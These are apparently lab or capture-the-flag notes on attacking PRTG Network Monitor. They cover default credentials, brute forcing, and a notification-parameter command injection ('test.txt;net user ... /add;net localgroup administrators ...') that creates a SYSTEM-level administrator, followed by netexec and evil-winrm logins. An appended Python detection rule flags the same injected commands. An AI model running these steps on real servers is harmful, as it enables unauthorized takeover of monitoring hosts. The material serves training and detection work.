
PRTG Network Monitor

  • PRTG Network Monitor is agentless network monitoring software.
  • It monitors bandwidth usage, uptime and statistics from hosts, routers, servers, etc.
  • Monitoring is sensor based, and it can auto-detect protocols such as ICMP, SNMP, WMI, NetFlow, etc.
  • Devices can also communicate with the tool via a REST API. The software runs entirely from an AJAX-based web interface, but a desktop application is available for Windows, Linux, and macOS.
  • CVEs - https://www.cvedetails.com/vulnerability-list/vendor_id-5034/product_id-35656/Paessler-Prtg-Network-Monitor.html
  • HTB box - https://0xdf.gitlab.io/2019/06/29/htb-netmon.html

Enum

  • nmap scan - the web interface is usually found on ports 80, 443 or 8080.
    • e.g. Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
  • EyeWitness flagged this host as using the default credentials prtgadmin:prtgadmin.
  • For network tools, look for notifications - these can allow scripts or command execution.

Attack:

  • We know the version is 18.1.37.13946.
  • It is vulnerable to command injection - https://codewatch.org/2018/06/25/prtg-18-2-39-command-injection-vulnerability/

Steps:

  • Log in to the application
    • Burp Intruder for brute forcing
    • prtgadmin:Password123
  • In System > Notification, add a notification.
  • Enable Execute Program and choose the Demo.ps1 file.
  • Add the following as the parameter to add a new domain user to the host:
    • test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;net localgroup administrators prtgadm1 /add
    • This works because network infrastructure tools usually run as SYSTEM/root.
  • Save the notification.
  • Click on the notification and, on the right side, click the bell (test notification).
  • After clicking Test we get a pop-up saying the EXE notification is queued up.
    • If we receive any sort of error message here, go back and double-check the notification settings.
  • Check using netexec smb 10.129.201.50 -u prtgadm1 -p Pwn3d_by_PRTG!
  • evil-winrm -i 10.129.201.50 -u prtgadm1 -p Pwn3d_by_PRTG!
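The detection-side counterpart to the notification abuse above, added here as an example and not part of the original notes: because the Execute Program notification runs as the PRTG service account (SYSTEM), the tell-tale on the host is a PRTG service binary spawning a shell that creates a local user or adds one to Administrators. The process names "PRTG Probe.exe" and "PRTG Server.exe", the Sysmon-style field names (ParentImage, Image, CommandLine, User) and the sample records are all assumptions constructed for the example; adapt them to the real log source.

```python
"""Flag process-creation records where a PRTG service process launches a shell
that changes local accounts or groups (added example; layout modelled on Sysmon
Event ID 1 fields, process names are assumptions)."""
import re
from typing import Iterable, Optional

# Assumed PRTG service binaries (lower-cased); verify against a real install.
PRTG_PARENTS = {"prtg probe.exe", "prtg server.exe"}

# Interpreters a notification would typically launch.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "net.exe", "net1.exe"}

# Account or group changes a monitoring tool has no reason to make.
SUSPICIOUS_CMD = re.compile(
    r"net(?:1)?(?:\.exe)?\s+(?:user\s+\S+(?:\s+\S+)?\s+/add"
    r"|localgroup\s+administrators\s+\S+\s+/add)",
    re.IGNORECASE,
)


def image_name(path: str) -> str:
    """Basename of a Windows or POSIX path, lower-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(record: dict) -> Optional[str]:
    """Return a finding string for one process-creation record, or None."""
    parent = image_name(record.get("ParentImage", ""))
    child = image_name(record.get("Image", ""))
    cmdline = record.get("CommandLine", "")
    user = record.get("User", "?")
    if parent not in PRTG_PARENTS:
        return None  # out of scope for this rule
    if SUSPICIOUS_CMD.search(cmdline):
        return f"prtg-account-change [{user}] {parent} -> {child}: {cmdline}"
    if child in SHELLS:
        # Lower severity: a notification ran a script, contents unknown.
        return f"prtg-shell-spawn [{user}] {parent} -> {child}: {cmdline}"
    return None


def scan(records: Iterable[dict]) -> list:
    """Run classify() over every record and keep the findings in order."""
    return [f for f in (classify(r) for r in records) if f]


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {   # notification parameter smuggling net commands, as in the notes above
        "ParentImage": r"C:\Program Files (x86)\PRTG Network Monitor\PRTG Probe.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'cmd.exe /c "Demo.ps1 test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;'
                       r'net localgroup administrators prtgadm1 /add"',
        "User": r"NT AUTHORITY\SYSTEM",
    },
    {   # notification running its script without account changes
        "ParentImage": r"C:\Program Files (x86)\PRTG Network Monitor\PRTG Probe.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File Demo.ps1 test.txt",
        "User": r"NT AUTHORITY\SYSTEM",
    },
    {   # same command from an interactive admin; a different rule's job
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd.exe /c net user helpdesk Temp123! /add",
        "User": r"CORP\admin",
    },
    {   # ordinary sensor activity from the probe
        "ParentImage": r"C:\Program Files (x86)\PRTG Network Monitor\PRTG Probe.exe",
        "Image": r"C:\Windows\System32\ping.exe",
        "CommandLine": r"ping.exe -n 1 10.0.0.1",
        "User": r"NT AUTHORITY\SYSTEM",
    },
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The rule is deliberately scoped to PRTG as the parent: the same "net user ... /add" from explorer.exe is left to a general account-creation rule, while any shell spawned by the probe is reported at lower severity so that a notification running an unexpected script is still visible even when its command line looks harmless.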